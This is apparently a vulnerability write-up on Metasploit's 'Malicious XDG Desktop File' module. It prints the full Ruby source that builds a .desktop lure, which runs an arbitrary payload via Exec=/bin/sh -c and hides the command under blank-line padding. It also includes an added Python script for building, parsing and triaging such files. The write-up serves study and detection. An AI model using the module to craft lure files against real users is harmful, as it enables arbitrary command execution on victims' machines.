Malicious XDG Desktop File

Vulnerability information

Vulnerability name: Malicious XDG Desktop File

Vulnerability type: Malicious file (file format exploit; the module is an Msf::Exploit::FILEFORMAT payload generator, not a file upload flaw)

Severity: High

Description: This entry covers the creation and use of a malicious XDG desktop (.desktop) file. Desktop entries are configuration files used by desktop environments on Linux, Unix, Solaris and FreeBSD to define how an application is launched and how it is shown in menus and file managers. They are used across desktop environments such as GNOME and KDE and are part of everyday desktop use.

The technical root of the issue is that a desktop entry's Exec= key is a command line, so whoever controls the file controls what runs when it is opened. Most modern systems do not trust desktop files by default and warn the user before running one, but the user can choose to run it anyway. The default file managers of some desktop environments impose stricter requirements, prompting the user to mark the file as executable and/or as trusted before it will run. A crafted .desktop file plus a user who clicks through those prompts is all the attacker needs for the command to run.

The risk is rated high because the outcome is arbitrary command execution in the victim's desktop session (ATT&CK T1204.002, User Execution: Malicious File). The attacker only needs to deliver the file (e-mail attachment, download, shared folder) and have the user open it and dismiss or work around the warnings; no authentication and no further interaction are required. Because .desktop files are common and look like ordinary shortcuts, users may not treat them with the suspicion they give to executables, which makes the lure more likely to succeed. Note that execution is not automatic: unless the user opens the file and accepts the prompts, nothing runs.

Product: XDG Desktop (desktop environments implementing the freedesktop.org Desktop Entry Specification)

Source: https://github.com/rapid7/metasploit-framework/blob/a7ab23d0839e90481bdaac16ffd41e27f0c502ba/modules%2Fexploits%2Fmulti%2Ffileformat%2Fxdg_desktop.rb

Source type: rapid7/metasploit-framework on GitHub (the link points at the module file in the repository, not at an issue)

PoC details


##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Malicious XDG Desktop File',
        'Description' => %q{
          This module creates a malicious XDG Desktop (.desktop) file.

          On most modern systems, desktop files are not trusted by default.
          The user will receive a warning prompt that the file is not trusted
          when running the file, but may choose to run the file anyway.

          The default file manager applications in some desktop environments
          may impose more strict execution requirements by prompting the user
          to set the file as executable and/or marking the file as trusted
          before the file can be executed.
        },
        'Author' => [
          'bcoles'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['ATT&CK', Mitre::Attack::Technique::T1204_002_MALICIOUS_FILE],
          ['URL', 'https://specifications.freedesktop.org/desktop-entry-spec/latest/'],
          ['URL', 'https://specifications.freedesktop.org/desktop-entry-spec/latest/exec-variables.html'],
          ['URL', 'https://wiki.archlinux.org/title/Desktop_entries']
        ],
        'Platform' => %w[linux unix solaris freebsd],
        'Arch' => [ARCH_CMD],
        'Targets' => [
          [ 'Automatic', {} ]
        ],
        'DefaultTarget' => 0,
        'Privileged' => false,
        'DisclosureDate' => '2007-02-06',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [SCREEN_EFFECTS]
        }
      )
    )

    register_options([
      OptString.new('FILENAME', [true, 'The desktop file name.', 'msf.desktop']),
      OptString.new('APPLICATION_NAME', [false, 'The application name. Some file managers will display this name instead of the file name. (default is random)', '']),
    ])

    register_advanced_options([
      OptInt.new('PrependNewLines', [false, 'Prepend new lines before the payload.', 100]),
    ])
  end

  # Name= shown by file managers: the user-supplied value, or a random alphabetic string.
  def application_name
    datastore['APPLICATION_NAME'].blank? ? rand_text_alpha(6..12) : datastore['APPLICATION_NAME']
  end

  def exploit
    values = [
      'Type=Application',
      "Name=#{application_name}",
      # 'Hidden=true', # This property is not supported by old systems, which prevents execution
      'NoDisplay=true',
      'Terminal=false'
    ]
    # Header group, with the key order randomised on every run.
    desktop = "[Desktop Entry]\n"
    desktop << values.shuffle.join("\n")
    desktop << "\n"
    # Blank-line padding (PrependNewLines, default 100) between the header keys and the Exec line.
    desktop << "\n" * datastore['PrependNewLines']

    # The payload becomes a single double-quoted Exec argument, so backslashes are doubled
    # and double quotes are escaped as \" per the Desktop Entry Specification quoting rules.
    escaped_payload = payload.encoded.gsub('\\', '\\\\\\').gsub('"', '\\"')
    desktop << "Exec=/bin/sh -c \"#{escaped_payload}\""

    file_create(desktop)
  end
end
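The following Python script is an added example and is not part of the Metasploit module or of the listing above. It rebuilds a .desktop file the way the description and the module's exploit method do (header keys, blank-line padding, and the same backslash and double-quote escaping before wrapping the command in /bin/sh -c "..."), then parses the Exec= value back with the Desktop Entry Specification's quoting rules to show exactly which command the shell receives, and finally flags the indicators a defender can check for when triaging a suspicious .desktop file. The function names, the indicator labels and the threshold of 20 blank lines are my own choices; the sample command is constructed.

```python
"""Build, parse and triage XDG desktop entries (added example, not the module's code)."""
import re

# Interpreters whose "-c" argument is a free-form command line (assumption: common shells only).
SHELL_RE = re.compile(r"(^|/)(sh|bash|dash|zsh|ksh)$")
PADDING_THRESHOLD = 20  # blank lines before Exec= that we treat as deliberate padding (own choice)


def escape_for_exec_quotes(cmd: str) -> str:
    """The two substitutions the module applies: backslash -> \\\\, double quote -> \\"."""
    return cmd.replace("\\", "\\\\").replace('"', '\\"')


def build_desktop_entry(cmd: str, name: str = "Update", padding: int = 100) -> str:
    """Header keys, blank-line padding, then Exec= running cmd through /bin/sh -c."""
    header = ["[Desktop Entry]", "Type=Application", f"Name={name}", "NoDisplay=true", "Terminal=false"]
    return "\n".join(header) + "\n" + "\n" * padding + f'Exec=/bin/sh -c "{escape_for_exec_quotes(cmd)}"\n'


def parse_desktop_entry(text: str) -> dict:
    """Keys of the [Desktop Entry] group, plus how many blank lines preceded Exec=."""
    entry, group, blank_run, blank_before_exec = {}, None, 0, 0
    for line in text.splitlines():
        if not line.strip():
            blank_run += 1
            continue
        stripped = line.strip()
        if stripped.startswith("[") and stripped.endswith("]"):
            group = stripped[1:-1]
        elif group == "Desktop Entry" and not stripped.startswith("#") and "=" in stripped:
            key, _, value = stripped.partition("=")
            key = key.strip()
            if key == "Exec":
                blank_before_exec = blank_run
            entry[key] = value.strip()
        blank_run = 0
    entry["_blank_lines_before_exec"] = blank_before_exec
    return entry


def split_exec(exec_value: str) -> list:
    """Split an Exec= value into argv using the spec's quoting rules:
    arguments are separated by whitespace, may be wrapped in double quotes, and inside
    quotes a backslash escapes the next character (\\ " ` $). Field codes such as %U
    are returned as literal tokens; expanding them is the launcher's job, not ours."""
    argv, cur, quoted, pending, i = [], [], False, False, 0
    while i < len(exec_value):
        c = exec_value[i]
        if quoted:
            if c == "\\" and i + 1 < len(exec_value):
                cur.append(exec_value[i + 1])
                i += 2
                continue
            if c == '"':
                quoted = False
            else:
                cur.append(c)
        elif c == '"':
            quoted, pending = True, True  # pending keeps an empty "" argument
        elif c.isspace():
            if pending or cur:
                argv.append("".join(cur))
                cur, pending = [], False
        else:
            cur.append(c)
        i += 1
    if pending or cur:
        argv.append("".join(cur))
    return argv


def suspicious_indicators(text: str) -> list:
    """Triage flags for a desktop entry; an empty list means nothing stood out."""
    entry = parse_desktop_entry(text)
    argv = split_exec(entry.get("Exec", ""))
    flags = []
    if argv and SHELL_RE.search(argv[0]) and "-c" in argv[1:]:
        flags.append("exec-via-shell-c")       # Exec hands an arbitrary command line to a shell
    if entry.get("NoDisplay", "").lower() == "true" or entry.get("Hidden", "").lower() == "true":
        flags.append("hidden-from-menus")      # entry does not want to be seen in app menus
    if entry["_blank_lines_before_exec"] >= PADDING_THRESHOLD:
        flags.append("padded-exec")            # Exec pushed far below the visible header
    return flags


if __name__ == "__main__":
    sample = build_desktop_entry('echo "hi \\ there" > /tmp/x')  # constructed sample command
    print(split_exec(parse_desktop_entry(sample)["Exec"]))
    print(suspicious_indicators(sample))
```

The round trip matters for the escaping: split_exec recovers the original command byte for byte from the Exec= line, which is why the module only has to escape backslashes and double quotes. A file with all three flags set is a strong match for the module's output; a single flag (for example Hidden=true on a packaging-generated entry) is common in legitimate files, so treat the flags as triage hints rather than a verdict.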



Author: lianccc
Published: 4 August 2025
Permalink: http://example.com/2025/08/04/github_2350944162/